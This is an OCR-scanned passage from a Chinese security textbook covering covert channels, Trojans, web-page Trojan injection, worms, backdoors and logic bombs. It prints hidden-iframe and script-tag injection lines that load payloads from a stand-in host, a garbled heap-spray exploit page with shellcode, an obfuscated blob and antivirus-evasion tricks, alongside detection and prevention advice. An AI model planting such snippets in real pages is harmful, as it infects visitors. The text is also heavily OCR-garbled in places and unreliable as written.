隐蔽 主要 采用 隐蔽 通道 技术 。 美 国 国防 部 可 信 操 作 系统 评 测 标准 对 隐蔽 通道 进行 了 如 下 和 定 
义 : 隐蔽 通道 是 允许 进程 违反 系统 安全 策略 传输 信息 的 通道 。 

隐蔽 通道 分 为 两 种 类 型 : 存储 隐蔽 通道 和 时 间 隐 项 通道 。 存 储 隐 项 通道 是 一 个 进程 能 
够 直接 或 间接 访问 某 存储 空间 ,而 该 存储 空间 又 能 够 被 另 一 个 进程 所 访问 ,这 两 个 进程 之 间 
所 形成 的 通道 称 为 存储 隐蔽 通道 。 时 间 隐 蔽 通道 是 一 个 进程 对 系统 性 能 产生 的 影响 可 以 被 
另外 一 个 进程 观察 到 并 且 可 以 利用 一 个 时 间 基 准 进行 测量 ,这 样 形成 的 信息 传递 通道 称 为 
时 间 隐 项 通道 。 

传统 的 隐蔽 通道 研究 中 ,都 是 把 隐蔽 通道 定义 在 操作 系统 的 内 部 ,研究 表明 隐蔽 通道 
也 适用 于 网 络 。 发 送 进程 和 接收 进程 共享 一 个 客体 : 网 络 数据 包 。 发 送 进程 能 够 改变 客 
体 , 也 就 是 可 以 将 客体 进行 形式 变换 ,以 便 进 行 信息 隐藏 。 接 收 进程 能 够 检测 到 客体 的 
变化 ,也 就 是 可 以 将 客体 还 原 ,将 隐蔽 的 信息 解读 出 来 。 对 数据 包 内 容 的 修改 对 应 于 存 
储 隐蔽 通道 ,对 数据 包 顺 序 进行 变换 或 者 改变 数据 包 发 送 响 应 时 间 则 可 以 对 应 于 时 间 隐 

在 TCP/IP 协议 簇 中 ,有 许多 元 余 信息 可 以 用 于 建立 隐蔽 通道 。 攻 击 者 可 以 利用 这 些 
隐蔽 通道 绕 过 网 络 安全 机 制 秘密 地 传输 数据 。TCP/IP 数据 包 格 式 在 实现 时 为 了 适应 复杂 
多 变 的 网 络 环境 ,有 些 信 息 可 以 使 用 多 种 方式 表示 ,恶意 代码 可 以 利用 这 些 宛 余 信息 进行 
隐蔽 。 

如 果 选 用 安全 策略 允许 的 端口 进行 传输 ,比如 拥 绑 在 WWW 通信 服务 中 , 则 可 以 穿 透 
防火 墙 和 避 过 入 侵 检测 等 系统 的 检测 ,因而 具有 较 强 的 生命 力 。 


6.5 特洛伊 木马 


6.5.1 特洛伊 木马 概念 


特洛伊 木马 (Torjan horse, 简 称 木 马 ) ,其 名 称 取 自古 希腊 神话 “木马 屠城 记 ”。 它 是 一 
个 具有 伪装 能 力 、 隐 项 执行 的 非法 功能 的 恶意 程序 ,而 受害 用 户 表面 上 看 到 的 是 合法 功能 执 
行 。 目 前 ,特洛伊 木马 已 成 为 黑客 常用 的 攻击 方法 , 它 通 过 伪装 成 合法 程序 或 文件 , 植 人 
系统 ,对 网 络 系统 安全 构成 严重 威胁 。 据 统计 ,2011 年 有 近 900 万 台 机 器 有 被 植 人 远程 
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管理 木马 的 迹象 。 同 计算 机 病毒 、 网 络 蠕虫 相 比较 ,特洛伊 木马 不 具有 自我 传播 能 力 , 其 
传播 是 通过 其 他 的 传播 机 制 来 实现 的 。 攻 击 者 能 不 同 程度 地 远程 控制 受到 特洛伊 木马 
侵害 的 计算 机 ,例如 访问 受害 计算 机 、 在 受害 计算 机 中 执行 命令 或 利用 受害 计算 机 进行 
DDoS 攻击 。 


6.5.2 特洛伊 木马 的 分 类 


根据 特洛伊 木马 的 管理 方式 来 分 析 , 特 洛 伊 木马 可 以 分 为 本 地 特洛伊 木马 和 网 络 特 洛 
伊 木马。 本 地 特洛伊 木马 是 最 早期 的 一 类 ,其 特点 是 木马 只 运行 在 本 地 的 单 台 主机 ,木马 没 
有 远程 通信 功能 ,木马 的 攻击 环境 是 多 用 户 的 UNIX 系统 ,典型 例子 就 是 次 用 口令 的 木马 。 
网 络 特洛伊 木马 是 指 具 有 网 络 通信 连接 及 服务 功能 的 一 类 木马 ,简称 网 络 木马 。 此 类 木马 
由 两 部 分 组 成 , 即 远程 木马 控制 管理 和 木马 代理 ,其 中 远程 木马 控制 管理 主要 是 监测 木马 代 
理 的 活动 ,远程 配置 管理 代理 ,收集 木马 代理 穷 取 的 信息 ; 而 木马 代理 则 是 植 入 到 目标 系统 
中 ,伺机 获取 目标 系统 的 信息 或 控制 目标 系统 的 运行 ,类 似 网 络 管理 代理 。 目 前 ,特洛伊 木 
马 一 般 泛 指 这 两 类 木马 ,而 网 络 木 马 已 成 为 主要 类 型 。 虽 然 木 马 攻 击 危 害 大 ,但 木马 攻击 是 
否 成 功 ,还 要 取决 于 以 下 条 件 。 

(1) 木马 攻击 者 要 写 出 一 段 程序 , 既 要 能 进行 非法 操作 ,又 要 让 程序 的 行为 不 会 引起 用 
户 的 怀疑 。 

(2) 木马 攻击 者 应 可 使 用 某 种 方法 ,使 得 受害 者 能 够 访问 、. 安 装 或 接收 这 段 程序 。 

(3) 木马 攻击 者 必须 使 受害 者 运行 该 程序 。 

(4) 木马 攻击 者 应 可 使 用 某 种 方法 获取 木马 操作 结果 ,例如 获得 木马 复制 的 保密 信息 。 


6.5.3 特洛伊 木马 的 运行 机 制 


受 木 马 攻击 者 的 意图 影响 ,其 行为 表现 各 异 , 但 基本 运行 机 制 相 同 , 整 个 木马 的 攻击 过 
程 主要 分 为 5 个 部 分 。 

(1) 寻找 攻击 目标 。 攻 击 者 通过 互联 网 或 其 他 方式 搜索 潜在 的 攻击 目标 。 

(2) 收集 目标 系统 的 信息 ,主要 包括 操作 系统 类 型 .网 络 结构 ,应 用 软件 和 用 户 习 惯 等 。 

(3) 将 木马 植 入 目标 系统 。 攻 击 者 根据 所 搜集 到 的 信息 ,分析 目 标 系统 的 脆弱 性 ,制定 
植 入 木马 策略 。 木 马 植 入 的 途径 有 很 多 ,如 通过 网 页 点 击 、 执 行 电子 邮件 等 。 

(4) 木马 隐藏 。 为 实现 攻击 意图 ,木马 设法 隐藏 其 行为 ,包括 目标 系统 隐藏 .本 地 活动 
隐藏 和 远程 通信 隐蔽 。 

(5) 攻击 意图 实现 , 即 激活 木马 ,实施 攻击 。 木 马 植 和 系统 后 , 待 触 发 条 件 满足 后 ,就 进 
行 攻击 破坏 活动 ,如 窃取 口令 ,远程 访问 和 删除 文件 等 。 木 马 运行 机 制 如 图 6-3 所 示 。 


6.5.4 网 页 挂 马 


网 页 挂 马 就 是 攻击 者 通过 在 正常 的 页 面 中 (通常 是 网 站 的 主页 ) 插 入 一 段 代码 。 浏 览 者 
在 打开 该 页 面 的 时 候 , 这 段 代 码 被 执行 ,然后 下 载 并 运行 某 木马 的 服务 器 端 程序 ,进而 控制 
浏览 者 的 主机 。 随 着 网 络 技术 的 发 展 , 挂 马 越 来 越 多 。 网 络 上 挂 马 的 程序 非常 多 ,并 且 挂 马 
的 代码 不 用 攻击 者 编写 ,完全 可 以 采用 工具 化 、 傻 瓜 化 的 方式 实现 ,其 技术 门槛 相对 比较 低 ， 
因此 目前 对 于 网 络 的 危害 也 特别 大 。 
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图 6-3 木马 运行 机 制 流程 图 


1. 网 页 挂 马 的 种 类 

网 页 挂 马 的 种 类 主要 有 以 下 几 种 。 

(1) iframe 式 挂 马 。 网 页 木马 是 被 攻击 者 利用 iframe 语句 ,加 载 到 任意 网 页 中 都 可 执 
行 的 挂 马 形式 ,是 最 早 也 是 最 有 效 的 一 种 网 络 挂 马 技术 。 通 常 的 挂 马 代码 如 下 : 


< iframe src = http://www. xxx. com/muma. html width = 0 height = 0></iframe> 


在 打开 插入 该 句 代码 的 网 页 后 ,也 就 打开 了 http://www. xxx. com/muma. html 页 面 ， 
但 是 由 于 它 的 长 和 宽 都 为 "0”, 所 以 很 难 被 察觉 ,非常 具有 隐蔽 性 。 

(2) js 脚本 挂 马 。js 挂 马 是 一 种 利用 js 脚本 文件 调用 的 原理 进行 的 网 页 木马 隐 项 挂 马 
技术 ,通常 黑客 先 制作 一 个 .js 文件 ,然后 利用 js 代码 调用 到 挂 马 的 网 页 。 通 常 代 码 如 下 : 


< script language = javascript src = http://www. xxx.com/gm. js ></script > 


http://www. xxx. com/gm.js 就 是 一 个 js 脚本 文件 ,通过 它 调用 和 执行 木马 的 服务 
端 。 这 些 js 文件 一 般 都 可 以 通过 工具 生成 ,攻击 者 只 需 输 入 相关 的 选项 就 可 以 了 。 

(3) 图 片 伪装 挂 马 。 攻 击 者 将 类 似 http://www. xxx. com/test. htm 中 的 木马 代码 植 
入 到 test. gif 图 片 文件 中 ,这 些 租 入 代码 的 图 片 都 可 以 用 工具 生成 ,攻击 者 只 需 输入 相关 的 
选项 就 可 以 了 。 图 片 木马 生成 后 .再 利用 代码 调用 执行 ,代码 如 : 

<html> 

< iframe src = "http://www. xxx. com/test. htm" height = 0 width = 0> </iframe> 


< img src = "http://www. xxx. com/test. jpg"></center> 
</htm]l > 


这 样 , 当 用 户 打 开 http://www. xxx. com/test. htm 时 ,网 页 中 的 木马 代码 也 随 之 


[ey 
a 


(4) 网 络 钓鱼 式 挂 马 。 这 是 网 络 中 最 常见 的 欺骗 手段 ,黑客 们 利用 人 们 的 猎奇 贪心 等 
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心理 伪造 一 个 链接 或 者 一 个 网 页 ,利用 社会 工程 学 欺骗 方法 ,引诱 用 户 点 击 , 当 用 户 打开 一 
个 看 似 正 常 的 页 面 时 ,网 页 代码 随 之 运行 ,隐蔽 性 极 高 。 这 种 方式 往往 和 欺骗 用 户 输入 某 些 
个 人 隐私 信息 ,然后 窃取 个 人 隐私 相关 联 。 常 见 的 如 获奖 消息 .赠送 QQ 币 等 。 

(5) URL 伪装 挂 马 。 这 是 一 种 高 级 欺骗 手段 ,是 黑客 利用 IE 或 者 Firefox 浏览 器 的 设 
计 缺 陷 制 造 的 一 种 高 级 欺骗 技 术 , 当 用 户 访问 木马 页 面 时 地 址 栏 显 示 www. sina. com 或 者 
security. ctocio. com. cn 等 用 户 信任 的 地 址 ,其 实 却 打 开 了 被 挂 马 的 页 面 , 从 而 实现 欺骗 。 

2. 网 页 挂 马 的 传播 方式 

网 页 挂 马 通常 采用 的 伪装 方式 和 传播 方式 主要 有 以 下 几 种 。 

(1) 将 木马 伪装 为 页 面 元 素 。 木 马 则 会 被 浏览 器 自动 下 载 到 本 地 。 

(2) 利用 脚本 运行 的 漏洞 下 载 木马 。 

(3) 利用 脚本 运行 的 漏洞 释放 隐 含 在 网 页 脚本 中 的 木马 。 

(4) 将 木马 伪装 为 缺失 的 组 件 , 或 和 缺失 的 组 件 拥 绑 在 一 起 (例如 : Flash 播放 插件 )。 
这 样 既 达 到 了 下 载 的 目的 ,下 载 的 组 件 又 会 被 浏览 器 自动 执行 。 

(5) 通过 脚本 运行 调用 某 些 COM 组 件 ,利用 其 漏洞 下 载 木马 。 

(6) 在 泻 染 页 面 内 容 的 过 程 中 利用 格式 溢出 释放 木马 (例如 : ani 格式 溢出 漏洞 )。 

(7) 在 泻 染 页 面 内 容 的 过 程 中 利用 格式 溢出 下 载 木 马 ( 例 如 : flash9. 0. 115 的 播放 漏洞 ) 。 

3. 网 页 挂 马 的 运行 方式 

网 页 挂 马 通常 会 采用 下 列 的 方式 运行 。 

(1) 利用 页 面 元 素 泻 染 过 程 中 的 格式 溢出 执行 shellcode 进一步 执行 下 载 的 木马 。 

(2) 利用 脚本 运行 的 漏洞 执行 木马 。 

(3) 伪装 成 缺失 组 件 的 安装 包 被 浏览 器 自动 执行 。 

(4) 通过 脚本 调用 . com 组 件 利用 其 漏洞 执行 木马 。 

(5) 利用 页 面 元 素 泻 染 过 程 中 的 格式 溢出 直接 执行 木马 。 

(6) 利用 . com 组 件 与 外 部 其 他 程序 通信 ,通过 其 他 程序 启动 木马 (例如 : RealPlayer 10.5 
存在 的 播放 列表 溢出 漏洞 ) 。 

另外 ,有 些 木 马 为 了 躲避 查 杀 ,还 采用 其 他 的 方式 或 具有 其 他 的 行为 ,包括 : 

(1) 修改 系统 时 间 ,使 杀毒 软件 失效 。 

(2) 摘除 杀毒 软件 的 HOOK 挂钩 ,使 杀毒 软件 检测 失效 。 

(3) 修改 杀毒 软件 病毒 库 ,使 之 检测 不 到 恶意 代码 。 

(4) 通过 洲 出 漏洞 不 直接 执行 恶意 代码 ,而 是 执行 一 段 调用 脚本 ,以 躲避 杀毒 软件 对 父 
进程 的 检测 。 

4. 网 页 挂 马 的 检测 

网 页 挂 马 的 检测 方式 主要 有 以 下 几 种 。 

(1) 特征 匹配 。 将 网 页 挂 马 的 脚本 按 脚 本 病毒 处 理 进行 检测 。 但 是 网 页 脚本 变形 方 
式 、 加 密 方式 比 起 传统 的 PE 格式 病毒 更 为 多 样 ,检测 起 来 也 更 加 困难 。 

(2) 主动 防御 。 当 浏览 器 要 做 出 某 些 动作 时 ,做 出 提示 ,例如 : 下 载 了 某 插件 的 安装 
包 , 会 提示 是 否 运行 ,比如 浏览 器 创建 一 个 暴风 影音 播放 器 时 ,提示 是 否 允 许 运 行 。 在 多 数 
情况 下 用 户 都 会 选择 是 ,网 页 木马 会 因此 得 到 执行 。 
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(3) 检查 父 进程 是 否 为 浏览 器 。 这 种 方法 可 以 很 容易 地 被 躲 过 且 会 对 很 多 捅 件 造成 
误 报 。 

5. 网 页 挂 马 的 防范 

通常 可 以 通过 以 下 的 措施 防范 网 页 挂 马 。 

(1) 开放 上 传 附 件 功能 的 网 站 一 定 要 进行 身份 认证 ,并 只 允许 信任 的 人 使 用 上 传 程序 。 

(2) 及 时 更 新 并 升级 所 使 用 的 程序 (包括 操作 系统 和 应 用 程序 ) 。 

(3) 建议 尽量 不 要 在 前 台 网 页 上 加 注 后 台 管理 程序 登录 页 面 的 链接 。 

(4) 及 时 备份 数据 库 等 重要 文件 ,但 不 要 把 备份 数据 库 放 在 程序 默认 的 备份 目录 下 。 

(5) 设置 较为 复杂 的 管理 员 的 用 户 名 和 密码 。 

(6) 设置 在 IIS 中 禁止 写 入 和 目录 禁止 执行 的 功能 ,两 项 功能 组 合 ,可 以 有 效 地 防止 
ASP 木马 。 

(7) 可 以 在 服务 器 、 虚 拟 主 机 控制 面板 ,设置 执行 权限 选项 中 ,直接 将 有 上 传 权限 的 目 
录 删 去 ,取消 ASP 的 运行 权限 。 

(8) 创建 一 个 Robots. txt 上 传 到 网 站 根 目录 。Robots 能 够 有 效 地 防范 利用 搜索 引擎 
窃取 信息 的 骇 客 。 

网 页 挂 马 涉及 很 多 信息 安全 技术 ,特别 是 目前 出 现 了 加 密 挂 马 技术 ,如 图 6-4 所 

一 个 未 加 密 的 挂 马 网 页 代码 ,而 经 过 加 密 后 的 网 页 代码 如 图 6-5 所 示 , 人 们 根本 无 法 判 

er de 因此 使 得 防范 更 加 困难 ,因此 必须 综合 各 个 方面 的 技术 进行 防范 。 


文件 如 六 加 吕 格式 查看 玫 肋 人 0 
Var url="httpJ/id-auto ruexpl9load php?id=30460" 
var m=new Array(), 
Var mf=0. 
function hex(num,width}{ 
var digits="0123456789ABCDEF" 
var hex=digits substr(num&OxF 1). 
while(num>OxF){ 
num=num>>>4: 
hex=digits substrtnum&OXF,1)+hex 


} 
var width=(width?width:0). 
while(hex length<width)hex="0"+hex, 
return hex 
} 
function addr(addr){ 
return unescape("%u"*+hex(addr&0xFFFF.4)+"%%U"+hex((addr>>16)8&0xFFFF.4)); 


} 
function unestst 
er 


torvartOicstr lengthi+=4){ 
tmp+=addr((str charCodeAlli+3) <24)+ 
(str charCodeAt(i+2)<<16)+ 
(str charCodeAt(i+1)<<8)+ 
Str charCodeAt)). 


} 
return unescape(tmp). 
function hav( 
m=m; 
setTimeout("hav()", 1000). 
} 
function gss(ss,sss\{ 
while(ss length*2<sss)ss+=ss; 
ss=5S. substring(0,sss/2). 
retum ss 
} 
function mL 


plc=unescape("%u4343%6u4343%6u4343%eu0FEB3%u335B3%u66C9%u80B936u80019euEF33% 
UE243%UuEBFA%UuE805%UuFFEC% uF YP 6UDF4E9%euEFEF%u64EF9euE3AF%u9F649ou42F3%ou9F643ou6EE79%euEF03% 


6-4 未 加 密 的 挂 马 网 页 
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ETEETDEERICII 


html><body><div style="displaynone” 习 
Id"content >eoziEgFo7OkorhiNvek@7DDXIOY9VOFAnwpHOgkX_ew3DODXxdp6niH3ceMYoe1Fhy@EYNdXriozv4IMSNhHadkSG5Mo4h 
W5opDeozriEgFo7OpxVywpzrioP1AXdF@sdpH7EYCcJXHagpPegY9nJYydDrioznE9Fo7E1YJhY@ogINQRyohi5AEY5koRA_gBG@mi5Twpzno 
2zmv4IMSwikVi1yJhY@gDHsaDFsnDM5HhkTiEyBHLopDeozrio1k5sepCcHpAVI3VD@ydDriozioPpAVhHagppHXI@dXriozio2YCcgl9sd1yn 
WMHhgkNgJkocHpAVIP3vD@PGRXDvhikwXriaziNDrioziEgFo7pkynek5VXcse1@cdicse1@dD3opDeozrio1k5sepCcEYCcDHPalpruY1e 
gY9gnJYywh1kVXT3OpX5aewwpzrniozroaekARDpSWh1kwXriazFYznoP1AXdF@sdpH7OF9niM5Ge19RGXwYznozroaekARDpS_DpCgwF67g1 
5OOPARpX5aew5Ge19RDP3vD@bj5@PbRXDOOPARpX5aew5vOF9nIMpHRyvoHP3VD@b5@PbRXydXriozFYzrioP1AXdF@sdpH7OkHa 
dM5hJkospweozrioPk6RJT@VeMFOHTwpzriozmxDIM5EOFo7OYFOYDYYM@RDHPalpmJYwodXFbRXwYzriazibgp3wOIGne1ocEXsnDMHhe 
Y6RwAXnh1UnyXywpyyglobRXDpzriozrvpM@RDHVchFogkpgahA@cOYDORX1xRyvopXeoznozr5hyJkoXpF54IMaDe1C4Bk5odXLoEIIvRXD 一 
pzriozrihJkoXpF54IMaDe1C4Bk5ohXydXrioziNDrioziOg1@aDMH7OKkHadMV4eMCcEKT79XwpzriozdeozriEhkHgekyDipSvhFvcOXwYzriozrT 
VRpwpzriozrsaekqshpCDhk@cHT54Ik5oHTPGY3QRXwpznozdeozriEhkHgekyDipSedMscpMsmpMsggXwYzriozrcchYPaeXsgDHPalpmJYIOjs 
gwMyhwMDNYMswXriozrihwMFhwMHhgkNgJkoslprcEyPhwMsDHyydXrioziOg1@aDMH7pMswXriozFYzrioP1AXdF@sdpH7OpscOXwYznioz 
TV4IMSQJpVVRkHadMV4eMCcHTC_J5sbYYC_J5sbYyC_J5sbYYyC_Jyba5AC_wys_XAC_D5vhuDC_JD3OuDC_JD3QRYC_g@bogYyC_g@ob 
YYC_g@_uAC_g@kQR5C_D@bakAC_D@bEGC_JD_JX@C_JO@bnRQ@C_9@ba5@C_D5@_5@C_g@sG5@C_gDbj5C_J50EkyC_gDbj 
5C_D5mak5C -9@b7YYC_g@ba5AC_55@_5@C_DAMQYYC_D5LW5C_g@LGuC_JycOYYC-_g@b4RYC_g@ba5@C_9AUX5C_DAM _5A 
C_W5cW5C_D5AGRYC_Jyc_WC_g@b4X@C_9Gba5@C_9AUIX5C_DAM_k5C_wAUcY5C_gy3_X@C_JYcDIQC_g@b7i@C_gG@ba5@C_ 
gAUX5C_DAM_kyC_JYSW5C_JWYbRRYC_JycVX@C_g@bgXAC_g@ba5@C_gAUX5C_DANE5@C_DymcY5C_JWUsX5C_JyCY5C_g@bR 
RDC_g@ba5@C_gAUX5C_gAbl5AC_J@cEX@C_9DURYAC_D5vGR5C_D@cGuAC -9g@kQX5C_g@bau@C-DAL 5@C_gDUXSC D5 
@h5AC_9@_4uUAC_gQ@mcR5C_D5@055C_DQ@cOuAC_JycOuDC_g@bij5C_qQ@ba5GC_JDc05GC_D@AbuDC_gDbgByC_w5kQY5C g 
人 @ba5@C_D5v_5@C_D@sGuAC_DYUi5C_DybYAC_D5v05Q@C_wAb4uAC __gy3W5C_g@ba5@C_DAba5@C_g9AUi5C_JDAE5AC_DAV_ 
BC BADIsC-JyeERSC 0QbeRBC 0QbasGXC 9AUalAC Dih5GC DA9 SQ WALoRYC DvRAC 0645GC TDUsY5C Gaba5 
@C_gDU4MYC_D5G@h5@C_9@sGUAC_g@mcR5C_D5@0555_D@cOuAC_gAbTY5C_g@ba5G@C JDA_5@C_DAc_BDC_gAUakAC J@ 
ag5AC_DAag5C_gy3OkAC_wAbsRAC_DAaR5@C_gAUISC_JDAEkyC_DAv_uAC_DAUISC_JycEk5C_g@bgrAC_g@ba5@C_g@bR5C 
_gDU4YC_D5@h5@C_g@cGuAC_g@WcR5C_D5@O55C_D@cOuAC_D@bTYSC_g@ba5@C_JDA_5@C_D5@GNYC_D@b4AC_g@mM 
CR5C_D5@055C_D@cOuAC_g@b7Y5C_g@ba5@C_oAma5@C_DAWRB5C_JymakAC_JymakAC_JymakAC_JymakAC_JySEYACG_DAA 
_5AC_D5@OkAC-JyWgR5C_DAW4jiDC_Jyb4iyC_D5@OuAC_D5@oYYC_g@coXyC_DAOEj5C_DAM_kyC_gDai5C_D5GbkyC_D@Lox 
AC_g@asY5C_DAMGYAC_0DMEj5C_g@ag5@C_JG@a4YAC_gAvOX5C_J50Gu@C_DyaakAC_JG@aRuDC_9@3GRDC_DG@baRyC_gywn 
u5C_g@coXAC_DYLORG@C_g@aa5yC_9Ab4i@C_gym7j5C_GyLbB5C_gDURuyC_DAAQRAC_JW@EI5C_DAAEj5C_g@ag5AC_JDMhXyC 
_9G@sE5C_D5@GB85C_D@s0u5C_wyo_kAC_gGLj5C_g@al5C_DALORAC_DyWR5YC_g@pak5C_gy 7Y5C_gy3GRYC_DAU4YC_gAsO 
R@c_OA3G5yYC_9@h4uyC_w5@F 门 C_W53eC_FyhgRAC_D5MDX@@C_PyNWI5C_w5AFRYC_D5h, 护 CTW5oGR@C_DyhIR5C_w5KFR5C 
_DybJWC_DybgRDC_D5bYAC_D5@ERYC_w530R@C_w53EIDC_D5MhX@C_wyNI5C_wy3hYyC_wywhi5C_Jy3hyNopDeozrio1AXrepCoe 
ndaGi CXwpricaYeTSHty O91 @a MHCEYy Xnc2n NF GYDeonoP koR SgLkGVNRTYF hey TYF FPSVINK A 3 SXE MPVIP GI 
PalprnJYIOIHsgwMFVFSVEX3rdX3vwykopDeozrioPk6RJTsgglrgwM5Ge19RJX59Jk6SEHsgwMyxEYNVIX50Jk6VEYNOOXXyFswXrioziEdpoc 
OYFQYDYWIYNwRYDdOXTWZYVYMswEMPgdDeozrio2Y6NXydXrioziOg1@aDMHcOyydXnozrfYzrioP1AXdFG@sdpH7pFXRIY5IFispweozrioP 
k6RJToaekFHhkPrdDeozriozYxcppNYIHsaDFsnDMyXd15QiHLoOIFOpwNopweozriozr@RgwwYzriozioPk6RJTVrdMynhIXRYHhgkNgJkoslprc 
OyPIFIXEpCXd1@chHLopDeozrioziOg1@Vi1XghkTalp@XpFoahF@ah@PahpCXek50ppNYh1VnDTydXrioznozroaekHhg1@4Bk@ROYNaJ 
kCcHTVrhFsggY9REHNhepsse1dOpXVrdMynhXwpzriozrioPMCngkoXeToaekwpzriozriNwF6nwF5cO1ydDriozriozroaekARDpSHhkPrdDeczri 
ozrFYzriozrFaepsadweozriozr@RgwwYzriozioPMCnglHadkSGkF@slkCcMvNYh1VnJXXRMYydXriozriozroaekARDpSOg1@wXriozriozdV4ekV 
CeXCspweozrioziOg1@aDMH7HpArepwpzriozriNDriozriNDriozrFYzrioP1AXdF@sdpH7pAoahF@adv5leHHspweozroPk6RJToVXpArepwpzr 


图 6-5 加 密 后 的 挂 马 网 页 


6.6 网 络 蠕虫 


随 着 网 络 系统 应 用 及 复杂 性 的 增加 ,网 络 蠕虫 成 为 网 络 系统 安全 的 重要 威胁 。 在 网 络 
环境 下 ,多 样 化 的 传播 途径 和 复杂 的 应 用 环境 使 网 络 蠕虫 的 发 生 频 率 增高 潜伏 性 变 强 、 覆 
盖 面 更 广 ,网 络 蠕虫 成 为 恶意 代码 研究 中 的 重 中 之 重 。 


6.6.1 网 络 蠕虫 的 定义 


网 络 蠕虫 是 一 种 智能 化 自动 化 的 计算 机 程序 ,综合 了 网 络 攻击 、 密 码 学 和 计算 机 病毒 
等 技术 ,是 一 种 无 须 计算 机 使 用 者 干预 即 可 运行 的 攻击 程序 或 代码 , 它 会 扫描 和 攻击 网 络 上 
存在 系统 漏洞 的 结 点 主机 ,通过 局 域 网 或 者 互联 网 从 一 个 结 点 传播 到 另外 一 个 结 点 。 

蠕虫 具有 主动 攻击 ` 行 踪 隐 项 .利用 漏洞 .造成 网 络 拥塞 降低 系统 性 能 .产生 安全 隐患 、 
反复 性 和 破坏 性 等 特征 ,网络 蠕虫 无 须 计 算 机 使 用 者 干预 即 可 运行 , 它 通 过 不 停 地 获得 网 络 
中 存在 漏洞 的 计算 机 上 的 部 分 或 全 部 控制 权 来 进行 传播 。 


6.6.2 网 络 蠕虫 的 结构 


网 络 蠕虫 的 功能 模块 可 以 分 为 主体 功能 模块 和 辅助 功能 模块 。 实 现 了 主体 功能 模块 的 
蠕虫 能 够 完成 复制 传播 流程 ,而 包含 辅助 功能 模块 的 蠕虫 程序 则 具有 更 强 的 生存 能 力 和 破 
坏 能 力 。 网 络 蠕虫 功能 结构 如 图 6-6 所 示 。 
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网 络 蠕虫 功能 模块 ) 


(主体 功能 模块 ) 《辅助 功能 模块 ) 


信 | [ 扫 ][ 攻 | [ 自 | [ 实 |[ 宿 ] [ 信 ] [ 远 ] [ 自 
鼻 || 揪 | | 击 || 我 | | 傅 || 主 || 息 || 各 | | 动 
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集 | | 测 || 透 || 进 | | 成 || 坏 || 信 || 制 | | 级 
和 横 || 模 | | 模 | | 模 | | 模 || 模 || 模 || 模 | | 模 
块 块 | | 块 | | 顽 || 块 || 块 || 雹 || 据 


图 6-6 网 络 蠕虫 的 结构 


1. 主体 功能 模块 

主体 功能 模块 由 4 个 模块 构成 。 

(1) 信息 搜集 模块 。 该 模块 决定 采用 何 种 搜索 算法 对 本 地 或 者 目标 网 络 进行 信息 搜 
集 ,内 容 包括 本 机 系统 信息 ,用 户 信息 .邮件 列表 、 对 本 机 的 信任 或 授权 的 主机 、 本 机 所 处 网 
络 的 拓扑 结构 .边界 路 由 信息 等 ,这 些 信息 可 以 单独 使 用 或 被 其 他 个 体 共享 。 

(2) 扫描 探测 模块 。 完 成 对 特定 主机 的 脆弱 性 检测 ,决定 采用 何 种 攻击 渗透 方式 。 

(3) 攻击 渗透 模块 。 该 模块 利用 (2) 获 得 的 安全 漏洞 ,建立 传播 途径 ,该 模块 在 攻击 方 
法 上 是 开放 的 、 可 扩充 的 。 

(4) 自我 推进 模块 。 该 模块 可 以 采用 各 种 形式 生成 各 种 形态 的 蠕虫 副本 ,在 不 同 主机 
间 完 成 蠕虫 副本 传递 。 例 如 ,Nimda 会 生成 多 种 文件 格式 和 名 称 的 蠕虫 副本 ，W32. Nachi. 
Worm 利用 系统 程序 (例如 TFTP) 来 完成 推进 模块 的 功能 等 。 

2. 辅助 功能 模块 

辅助 功能 模块 是 对 除 主体 功能 模块 外 的 其 他 模块 的 归纳 或 预测 ,主要 由 5 个 功能 模块 
构成 。 

(1) 实体 隐藏 模块 。 包 括 对 蠕虫 各 个 实体 组 成 部 分 的 隐藏 .变形 .加密 以 及 进程 的 隐 
藏 ,主要 提高 蠕虫 的 生存 能 力 。 

(2) 宿主 破坏 模块 。 该 模块 用 于 摧毁 或 破坏 被 感染 主机 ,破坏 网 络 正 常 运行 ,在 被 感染 
主机 上 留 下 后 门 等 。 

(3) 信息 通信 模块 。 该 模块 能 使 蠕虫 间 、 蠕 虫 同 黑客 之 间 进 行 交 流 ,这 是 未 来 蠕虫 发 展 
的 重点 。 利 用 通信 模块 ,蠕虫 间 可 以 共享 某 些 信息 ,使 蠕虫 的 编写 者 更 好 地 控制 蠕虫 行为 。 

(4) 远程 控制 模块 。 控 制 模块 的 功能 是 调整 蠕虫 行为 ,控制 被 感染 主机 ,执行 蠕虫 编写 
者 下 达 的 指令 。 

(5) 自动 升级 模块 。 该 模块 可 以 使 蠕虫 编写 者 随时 更 新 其 他 模块 的 功能 ,从 而 实现 不 
同 的 攻击 目的 。 


6.6.3 其 他 恶意 代码 


其 他 恶意 代码 主要 包括 后 门 程序 .逻辑 炸弹 和 细菌 。 
(1) 后 门 程序 (Backdoor) 一 般 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 
程序 方法 。 在 软件 的 开发 阶段 ,程序 员 常 常会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设 
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计 中 的 缺陷 。 但 是 ,如 果 这 些 后 门 被 其 他 人 知道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 程序 ， 
那么 它 就 成 了 安全 风险 ,容易 被 黑客 当成 漏洞 进行 攻击 。 后 门 是 一 种 登录 系统 的 方法 , 它 不 
仅 可 以 绕 过 系统 已 有 的 安全 设置 ,而 且 还 能 挫败 系统 上 各 种 增强 的 安全 设置 。 后门 能 相互 
关联 。 例 如 ,黑客 可 能 使 用 密码 破解 一 个 或 多 个 账号 密码 ,黑客 可 能 会 建立 一 个 或 多 个 账 
号 。 一 个 黑客 可 以 存 取 这 个 系统 ,黑客 可 能 使 用 一 些 技术 或 利用 系统 的 某 个 漏洞 来 提升 权 
限 。 黑 客 可 能 使 用 一 些 技术 或 利用 系统 的 某 个 漏洞 来 提升 权限 。 黑 客 可 能 会 对 系统 的 配置 
文件 进行 小 部 分 的 修改 ,以 降低 系统 的 防卫 性 能 。 也 可 能 会 安装 一 个 木马 程序 ,使 系统 打开 
一 个 安全 漏洞 ,以 利于 黑客 完全 掌握 系统 。 总 之 ,后 门 就 是 留 在 计算 机 系统 中 、 供 某 个 特殊 
使 用 者 通过 某 种 特殊 方式 控制 计算 机 系统 的 途径 。 

(2) 逻辑 炸弹 (Logic Bombs) 是 一 段 依附 在 其 他 软件 中 并 具有 触发 执行 破坏 能 力 的 程 
序 代码 。 人 逻辑 炸弹 的 触发 条 件 具 有 多 种 方 
